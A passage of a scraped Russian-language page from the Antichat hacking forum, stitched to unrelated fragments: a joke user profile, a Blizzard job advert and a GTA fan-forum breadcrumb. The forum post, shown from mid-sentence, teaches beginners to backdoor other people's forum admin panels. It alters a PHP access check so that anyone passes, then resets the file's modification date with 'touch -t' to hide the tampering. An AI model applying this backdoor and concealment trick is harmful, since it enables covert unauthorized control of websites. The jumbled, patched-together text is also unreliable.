то пишеться что ты болван, если же имеешь пропускает дальше. Для того чтобы нас приняли за своего надо изменить как ты понял эту строку if ($GROUP['g_access_cp'] != 1) на if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ) этим мы ей даем понять, если мы имеем доступ к админке, или не имеем, все равно нас пропустить. Знающие легко переделают код под себя, как им хочеться, впишут что хотят, но т.к. как статья расчитывалась для начинающих, то я думаю, что вам так понятней будет. Ну вот, самые важные аспекты я разобрал, если что непонятное спрашивайте. Указанный выше приём, сработал в 9/10 форумов. В десятом были поставлены права правильно, отсюда следует, что почти каждый форум уязвим. ТОЛЬКО НЕ ЗАБЫАЕМ ИЗМЕНЯТЬ ДАТУ изменения файла, командой
touch -t 200310240921
где 2003 год 10 месяц 24 число 09:21 часов
советую изначально посмотреть эту дату перед трояниваем, чтобы поставить точно такую же.
__________________
--------------------------------------------------------------------------------
Последний раз редактировалось Azazel, 09.05.2006 в 01:33.
qBiN
Посмотреть профиль
Репутация
Отправить персональное сообщение для qBiN
Отправить E-mail для qBiN
Посетить домашнюю страницу qBiN
Найти все сообщения от qBiN
Добавить qBiN в список друзей
« Предыдущая тема | Следующая тема »
Опции темы
Версия для печати
Отправить на E-mail
Опции просмотра
Линейный вид
Комбинированный вид
Древовидный вид
Поиск в этой теме
Расширенный поиск
Оценка этой теме
Вы уже оценили эту тему
Ваши права в разделе
Вы не можете создавать темы
Вы не можете отвечать на сообщения
Вы не можете прикреплять файлы
Вы не можете редактировать сообщения
--------------------------------------------------------------------------------
BB-коды Вкл.
Смайлики Вкл.
[img] код Вкл.
HTML код Выкл.
Быстрый переход
Выберите Панель управления Персональные сообщения Подписки Кто в Онлайне Поиск на форуме Главная страница форума -------------------- ENGLISH ZONE Forum for discussion of ANTICHAT ОСНОВНОЙ Новости Избранное Статьи Наши Статьи Чужие Статьи Уязвимости чатов Уязвимости форумов Расшифровка паролей E-Mail ICQ Продажа ICQ PHP, PERL, MySQL, JavaScript. ПО для web разработчика Безопасность WEB - приложений. Обсуждение Ваших сайтов XSS, SQL, Инъекции. Уязвимости, найденные вами. Безопасность в сети Анонимность Защита ОС: вирусы, антивирусы, файрвелы. БЕЗОПАСНОСТЬ - СЕРВЕРА LINUX, FREEBSD. Soft - Unix WINDOWS Soft - Windows Delphi, С/С++, C# АнтиАдмин БЕЗОПАСНОСТЬ - ДРУГОЕ Исследование программного обеспечения\реверсинг Crackmes Статьи Электроника и Фрикинг Ссылки Новостной фрик Сотовый фрикинг Железо Схемы и программы Телефония и связь ОФФТОП Болталка Развлечения Antichat's Quest On-line игры и другие. Уязвимости. Коды. Флейм Покупка, Продажа, Обмен, Раздача. Продажа ICQ Объявления Просьбы о взломах О Работе О ФОРУМЕ И САЙТЕ Правила форума. Обсуждения и добавления. Предложения по развитию сайта Запросы на исправление рейтингов Video.antichat.ru Комментарии к видео.
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Обзор уязвимостей phpBB] qBiN Уязвимости форумов 3 Вчера 01:46
Секреты быстрой раскрутки сайта Foto.ru - крупнейший интернет-магазин фототехники. Фотоаппараты и фотокамеры Canon, Nikon, Casio, Olympus, Pentax. Зарегистрируй себе домен RU
[AD]
реклама на форуме
Powered by: vBulletin Version 3.0.7
Copyright ©2000 - 2006, Jelsoft Enterprises Ltd.
- Группа Members of Antichat
- Группа Модераторы
- Группа Супермодераторы
- Группа Green
- Группа Администраторов.
(Ñ) ANTICHAT.RU
Ник: Gunner
Имя: тебе зачем? забыл я!
Домашний адрес: Россия Многобобров
Рабочий адрес: Зимбабве какой то
Компания: ЗАО Сортир
Пол: Муж.
Возраст: 15
Дата рождения: 26/02/1992
О себе:
гыгы. бляхаха. муахахаха. хахаха. ггг. шо еще?
кто это читает, тот лошара позорная). я это не читал.
Do you have the passion to create and the will to forge great games? If you seek challenge, inspiration, and strive for excellence then this is the company for you!
At Blizzard, you will work with some of the most creative and talented people in the industry, working together to create the best games in the world. If you share our goals, and have the skills, we want to hear from you!
* Read our Job F.A.Q.
* Learn what it takes to work at Blizzard Entertainment.
* Read tips on Resume and Portfolio Submission.
* Learn about the benefits that Blizzard Entertainment employees enjoy.
* View photos from the Blizzard Campus in Irvine, CA.
Вы здесь » Официальный форум проекта GTA Stanton » Проект Grand Theft Auto: Stanton » Я УЗНАЛ НЕВЪЕБЕННУЮ ИСТИНУ!!!!